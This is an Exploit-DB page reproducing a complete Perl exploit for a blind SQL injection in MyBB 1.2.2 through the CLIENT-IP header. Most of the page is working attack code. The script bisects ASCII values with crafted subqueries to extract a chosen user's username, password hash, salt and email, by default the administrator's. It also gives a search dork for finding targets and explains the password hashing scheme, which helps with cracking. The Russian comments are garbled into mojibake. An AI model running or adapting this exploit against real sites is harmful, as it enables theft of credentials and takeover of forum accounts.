MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection

EDB-ID:

3719

CVE:

N/A

EDB Verified:
Author:

Elekt

Type:

webapps

Exploit: /
Platform:

PHP

Date:

2007-04-12

Vulnerable App:
#!/usr/bin/perl
###########################################################
#########################  LOGO  ##########################
###########################################################
#     Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0     #
#                                                         #
#       [u]used:   SQL CLIENT_IP vulnerability            #
#       [!]need:   Mysql >= 4.1                           #
#       [w]work:   blind sql-inj                          #
#       [g]google: Powered By MyBB                        #
#                                                         #
#               coded by Elekt (antichat.ru)              #
###########################################################
#######################  Coments  #########################
###########################################################
#
# ÐžÐ¿Ð¸ÑÐ°Ð½Ð¸Ðµ:
# Ð Ð°Ð±Ð¾Ñ‚Ð° ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð° Ð¾ÑÐ½Ð¾Ð²Ð°Ð½Ð° Ð½Ð° sql-Ð¸Ð½ÑŠÐµÐºÑ†Ð¸Ð¸ Ð² HTTP_CLIENT_IP.
# ÐÐµÐ°Ð²Ñ‚Ð¾Ñ€Ð¸Ð·Ð¾Ð²Ð°Ð½Ð½Ñ‹Ð¹ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÑŒ Ð¼Ð¾Ð¶ÐµÑ‚ Ð²Ñ‹Ð¿Ð¾Ð»Ð½Ð¸Ñ‚ÑŒ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð»ÑŒÐ½Ñ‹Ð¹ SQL-Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð² Ð±Ð°Ð·Ñƒ.
#
# http://host.com/mybb/index.php
# MySQL error: 1064
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">'' at line 3
# Query: DELETE FROM mybb_sessions WHERE ip=''">'
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ÐÑ‚Ð¾ Ð½Ð¾Ð²Ð°Ñ Ð²ÐµÑ€ÑÐ¸Ñ ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð°. 
# ÐœÐ½Ð¾Ð¹ Ð±Ñ‹Ð» Ð½Ð°Ð¹Ð´ÐµÐ½ ÑÐ¿Ð¾ÑÐ¾Ð± Ð¾Ñ‚ÐºÐ°Ð·Ð°Ñ‚ÑŒÑÑ Ð¾Ñ‚ Ð¸ÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ benchmark,
# Ñ‡Ñ‚Ð¾ Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÐµÑ‚ ÑƒÑÐºÐ¾Ñ€Ð¸Ñ‚ÑŒ Ñ€Ð°Ð±Ð¾Ñ‚Ñƒ ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð°, Ð¿Ð¾Ð²Ñ‹ÑÐ¸Ñ‚ÑŒ Ð½Ð°Ð´ÐµÐ¶Ð½Ð¾ÑÑ‚ÑŒ Ð¿Ð¾Ð»ÑƒÑ‡ÐµÐ½Ð½Ñ‹Ñ… Ð´Ð°Ð½Ð½Ñ‹Ñ….
# 
# Ð Ð°Ð±Ð¾Ñ‚Ð° ÑÐºÑÐ¿Ð»Ð¾Ð¹Ñ‚Ð° Ð¾ÑÐ½Ð¾Ð²Ð°Ð½Ð° Ð½Ð° Ð¿Ñ€Ð¾Ð²Ð¾Ñ†Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ð¸ "Subquery returns more than 1 row" Ð¾ÑˆÐ¸Ð±ÐºÐ¸,
# Ñ‡Ñ‚Ð¾ Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÐµÑ‚ Ð¿Ñ€Ð¾Ð¸Ð·Ð²ÐµÑÑ‚Ð¸ blind-sql-inj: 
# 
# mybb
# match: "Subquery returns more than 1 row"
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>1,password,uid))<5)/*
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>254,password,uid))<5)/*
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# 
# ÐŸÐ¾Ð»ÐµÐ·Ð½Ñ‹Ðµ Ñ‚Ð°Ð±Ð»Ð¸Ñ†Ñ‹ Ð¸ Ð¿Ð¾Ð»Ñ:
# mybb_1.2.1: mybb_users - uid,username,password,salt,email,loginkey,icq,aim,regip
# 
# ÐÐ»Ð³Ð¾Ñ€Ð¸Ñ‚Ð¼ Ð³ÐµÐ½ÐµÑ€Ð°Ñ†Ð¸Ð¸ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¹ Ð² mybb:
# md5(md5($salt).md5($password))
# generate_salt{return random_str(8);}
# 
###########################################################
#########################  init  ###########################
###########################################################

use LWP::UserAgent; 
$sock = LWP::UserAgent->new();

$|=1;

&header();


###########################################################
#######################  Options  #########################
###########################################################

if (@ARGV < 2) {&info(); exit();}

$host = $ARGV[0]; # ÑÐµÑ€Ð²Ð°Ðº
$dir = $ARGV[1];  # Ð´Ð¸Ñ€Ð° Ñ Ñ„Ð¾Ñ€ÑƒÐ¼Ð¾Ð¼
$uid = 2;         # Ð°ÐºÐº Ð°Ð´Ð¼Ð¸Ð½Ð° Ð¿Ð¾ Ð´ÐµÑ„Ð°ÑƒÐ»Ñ‚Ñƒ
$uid = $ARGV[2] if $ARGV[2];

$debug = 0;            # Ñ€ÐµÐ¶Ð¸Ð¼ Ð¾Ñ‚Ð»Ð°Ð´ÐºÐ¸
$space = "char(58)";   # Ñ€Ð°Ð·Ð´ÐµÐ»Ð¸Ñ‚ÐµÐ»ÑŒ ÑÑ‚Ð¾Ð»Ð±Ñ†Ð¾Ð²
#$search = "password";  # Ñ‡Ñ‚Ð¾ Ð±Ñ€ÑƒÑ‚Ð¸Ð¼, ÑÐ¾Ð±ÑÑ‚Ð²ÐµÐ½Ð½Ð¾...
#$search = "concat(uid,$space,password,$space,salt)"; # uid:password:salt
$search = "concat(uid,$space,username,$space,password,$space,salt,$space,email)"; # uid:username:password:salt:email
$search = $ARGV[3] if $ARGV[3];

# $presetascii - Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ ascii-ÐºÐ¾Ð´Ð¾Ð² Ð´Ð»Ñ Ð±Ñ€ÑƒÑ‚Ð° Ð²ÐµÑ€Ð¾ÑÑ‚Ð½Ñ‹Ñ… Ð´Ð°Ð½Ð½Ñ‹Ñ…
# $presetascii = "0123456789abcdef";
# $presetascii = "0123456789"
# $presetascii = "abcdefghijklmnopqrstuvwxyz"
# $presetascii = "0123456789abcdefghijklmnopqrstuvwxyz"
# $presetascii = "Ð°Ð±Ð²Ð³Ð´ÐµÑ‘Ð¶Ð·Ð¸Ð¹ÐºÐ»Ð¼Ð½Ð¾Ð¿Ñ€ÑÑ‚ÑƒÑ„Ñ…Ñ†Ñ‡ÑˆÑ‰ÑŠÑ‹ÑŒÑÑŽÑ");
# Ñ†Ð¸ÐºÐ», Ð´Ð»Ñ Ð¿Ñ€Ð¾ÑÑ‚Ð¾Ñ‚Ñ‹ Ð·Ð°Ð´Ð°Ñ‘Ñ‚ Ð²ÑÐµ ÑÐ¸Ð¼Ð²Ð¾Ð»Ñ‹ Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÐ±Ð¾Ñ€Ð° 
$i=0;
while($i<=255){
$presetascii.=chr($i);$i++;
}

###########################################################
#########################  go!  ###########################
###########################################################


$time=localtime;
&log ("[i] Start time  $time\n");
&log ("[+] HOST \"$host\"\n");
&log ("[+] DIR  \"$dir\"\n");
&log ("[+] UID  \"$uid\"\n");
&log ("[+] Search  \"$search\"\n");

###########################################################
###### detecting vulnerability and searching prefix #######
###########################################################

# detecting vulnerability and searching prefix
&log ("[~] Testing forum vulnerabile... ");
$q = "";
$prefix=query($q,$host,$dir);
if($prefix ne "not_find"){&log ("Yes! Forum vulnerable!\n");sleep(1);&log ("[~] Searching prefix...");sleep(1);&log (" prefix find - \"$prefix\"\n"); }
else 
    {
     &log ("Sorry. Forum unvulnerable\n");
	 &footer();
     exit();
    }


###########################################################
#####################   brutforce   #######################
###########################################################

# brutforce
&log ("[~] Brutforce begin! it may take some time, plz, wait...\n");
$kol=1;
for ($control=0;$control==0;){
   &log("\n---------------- Simvol $kol ----------------\n\n") if $debug;
   $amin = 1;
   $amax = length($presetascii)-1;
   $n=0;

   # ÐµÑÐ»Ð¸ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ 4 Ð¸ Ð±Ð¾Ð»ÐµÐµ ÑÐ¸Ð¼Ð²Ð¾Ð»Ð¾Ð², Ð¿ÐµÑ€ÐµÐ¾Ð¿Ñ€ÐµÐ´ÐµÐ»ÑÐµÐ¼ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½, ÑƒÐ¼ÐµÐ½ÑŒÑˆÐ°Ñ ÐµÐ³Ð¾ Ð² 2 Ñ€Ð°Ð·Ð°
   while (($amax-$amin)>=4){
        print ("-> Try ".ord(substr($presetascii,$amin,1))." .. ".ord(substr($presetascii,$amax,1))." -> ") if $debug;;
	#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
	$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),password,uid))<5)/*";
        if (query($q,$host,$dir) eq "not_find") { 
          print ("Char>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
          $amin=int($amax-($amax-$amin)/2); }
        else { 
          print ("Char<".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
          $amax=int($amax-($amax-$amin)/2); };
   }
   
   # ÐµÑÐ»Ð¸ Ð´Ð¸Ð°Ð¿Ð°Ð·Ð¾Ð½ Ð¼ÐµÐ½ÐµÐµ 4-Ñ… ÑÐ¸Ð¼Ð²Ð¾Ð»Ð¾Ð², Ñ‚Ð¾ Ð¿ÐµÑ€ÐµÑ…Ð¾Ð´Ð¸Ð¼ Ðº Ð¿ÐµÑ€ÐµÐ±Ð¾Ñ€Ñƒ
   while ($amin<=$amax) {
     print ("-> Try ".ord(substr($presetascii,$amin,1))." ->") if $debug;;
     # Ð¿Ñ€Ð¾Ð²ÐµÑ€ÑÐµÐ¼ Ð¾Ñ‚Ð²ÐµÑ‚ ÑÐºÑ€Ð¸Ð¿Ñ‚Ð°, ÐµÑÐ»Ð¸ Ð¾Ñ‚Ð²ÐµÑ‚ Ð¿Ð¾Ð»Ð¾Ð¶Ð¸Ñ‚ÐµÐ»ÑŒÐ½Ñ‹Ð¹ Ñ‚Ð¾ Ð²Ñ‹Ð²Ð¾Ð´Ð¸Ð¼ ÑÐ¸Ð¼Ð²Ð¾Ð» Ð¸ Ð¸Ñ‰ÐµÐ¼ ÑÐ»ÐµÐ´ÑƒÑŽÑ‰Ð¸Ð¹ ÑÐ¸Ð¼Ð²Ð¾Ð» Ð² ÑÐ»Ð¾Ð²Ðµ, ÐµÑÐ»Ð¸ Ð½Ðµ Ð¾Ð¿Ñ€ÐµÐ´ÐµÐ»ÑÐµÐ¼ ÑÐ¸Ð¼Ð²Ð¾Ð» - Ð²Ñ‹Ñ…Ð¾Ð´.
	#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
	$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),password,uid))<5)/*";
     if (query($q,$host,$dir) eq "not_find") {
          &log (" FOUND!\n-> Ascii: ".ord(substr($presetascii,$amin,1))."\n-> Char: \"".substr($presetascii,$amin,1)."\"\n") if $debug;; 
          &log ("[$kol] Find - ascii:\"".ord(substr($presetascii,$amin,1))."\", char:\"".substr($presetascii,$amin,1)."\"\n") if !$debug;
          $rezultat_char = $rezultat_char.substr($presetascii,$amin,1); 
          $rezultat_ascii = $rezultat_ascii.ord(substr($presetascii,$amin,1)).","; 
          $amin=$amax+1;$control=1;}
        else { print (" NO =(\n") if $debug; $amin=$amin+1; };
   }
   if ($control==0) { 
     if($amin!=5){$rezultat_char = $rezultat_char."?";$rezultat_ascii = $rezultat_ascii."?,";
                  &log ("[$kol] Error! not found =( $amin\n") if !$debug;
                  &log (" Error! not found =(\n") if $debug;
     }else{$control=1;}
   }else {$control=0;}
   $kol++;
}

print ("\n[!] Yyyy-a-a-a-h-h-uuu!!!\n");
&log ("\n[*] Char: $rezultat_char\n[*] Ascii: $rezultat_ascii\n");
$time=localtime;
&log ("\n[i] Finish time  $time\n\n");


&footer();
exit();

###########################################################
########################  log   ##########################
###########################################################
# Ð»Ð¾Ð³
sub log($)
    {
     open(RES,">>".$host."_log.txt") || die "[-] Cannot open log file!"; ## ÐžÑ‚ÐºÑ€Ñ‹Ð²Ð°ÐµÐ¼ Ð»Ð¾Ð³ Ð´Ð»Ñ Ð´Ð¾Ð·Ð°Ð¿Ð¸ÑÐ¸
     print ("$_[0]");
     print RES ("$_[0]");
     close(RES);
    }

###########################################################
######################## footer  ##########################
###########################################################
# ÑÐ¿Ð¸Ð»Ð¾Ð³
sub footer()
    {
     print ("[G] Greets: Elekt (antichat.ru), 1dt.w0lf (rst/ghc)\n");
     print ("[L] Visit : www.antichat.ru\n");
    }


###########################################################
######################## header  ##########################
###########################################################
# Ñ…Ð¸Ð´ÐµÑ€
sub header()
{
print q(
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=
+     Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0     +
+                                                         +
+       [i]used:   SQL CLIENT_IP vulnerability            +
+       [!]need:   Mysql >= 4.1                           +
+       [w]work:   blind sql-inj                          +
+       [i]google: Powered By MyBB                        +
+                                                         +
+               coded by Elekt (antichat.ru)              +
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_+
);
}


###########################################################
########################  info   ##########################
###########################################################
# Ð¸Ð½Ñ„Ð¾
sub info()
{
 print q(
[i] Usage: 
 perl mybb122exp.pl [host] [/dir/] [uid] [search]
*-required
  *[host] - target host without http://
  *[/dir/] - installed forums dir
   [uid] - user uid (default=2)
   [search] - data (uid:username:password:salt:email)
	   
[E] Example: perl mybb122exp.pl host.com /forum/ 1 password

[i] mybb: md5(md5($salt).md5($password))

 );
}

###########################################################
#######################  sender   #########################
###########################################################
# Ð¿Ñ€Ð¾Ñ†ÐµÐ´ÑƒÑ€Ð° Ð¿Ñ€Ð¸ÐµÐ¼Ð°\Ð¿Ð¾ÑÑ‹Ð»ÐºÐ¸ Ð´Ð°Ð½Ð½Ñ‹Ñ…
sub query()
    {
     #&log ("\n\n$q\n\n") if $debug;
     my($q,$host,$dir) = @_;
     $res = $sock->get("http://".$host.$dir."index.php",'USER_AGENT'=>'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','CLIENT_IP'=>"' ".$q); 
     if($res->is_success)
        {
             if($res->as_string =~ /FROM (.*)sessions/) { return $1; } else {return "not_find";}
        }
     else{&log ("\n[!] Connection to $host FAILED! EXIT\n"); exit;}
    }

# milw0rm.com [2007-04-12]
Tags:
Advisory/Source: Link
Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services